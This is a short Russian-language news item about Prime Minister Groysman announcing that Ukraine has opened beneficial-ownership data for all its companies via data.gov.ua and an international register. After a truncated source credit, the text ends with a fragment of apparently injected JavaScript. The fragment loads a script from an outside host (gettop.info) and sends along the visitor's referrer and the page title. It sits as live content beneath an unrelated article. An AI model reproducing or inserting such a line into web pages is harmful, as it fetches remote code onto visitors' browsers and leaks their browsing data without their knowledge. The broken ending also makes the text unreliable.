Украина открыла данные о бенефициарах всех компаний — Гройсман

Украина открыла данные о бенефициарах всех компаний — Гройсман

Информация о бенефициарах всех украинских компаний будет публиковаться на едином государственном портале открытых данных.

Данные о бенефициарах всех компаний в Украине стали открытыми. Об этом на своей странице в Facebook сообщил премьер-министр Владимир Гройсман.

«Украина открыла данные о бенефициарах компаний и стала первой страной в мире, которая присоединилась к Глобальному реестру бенефициарных собственников — инициативы Transparency International по содействию прозрачности и предотвращению коррупции», — отметил он.

Он уточнил, что данные о бенефициарах всех украинских компаний опубликованы на едином государственном портале открытых данных по адресу data.gov.ua, а также в Глобальном реестре бенефициарных собственников (register.openownership.org).

СМИ и общественность может свободно использовать и анализировать эти открытые данные для публичного контроля, а ИТ-бизнес — для создания новых сервисов, подчеркнул премьер.

Информационное агентств www.liga.ne

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;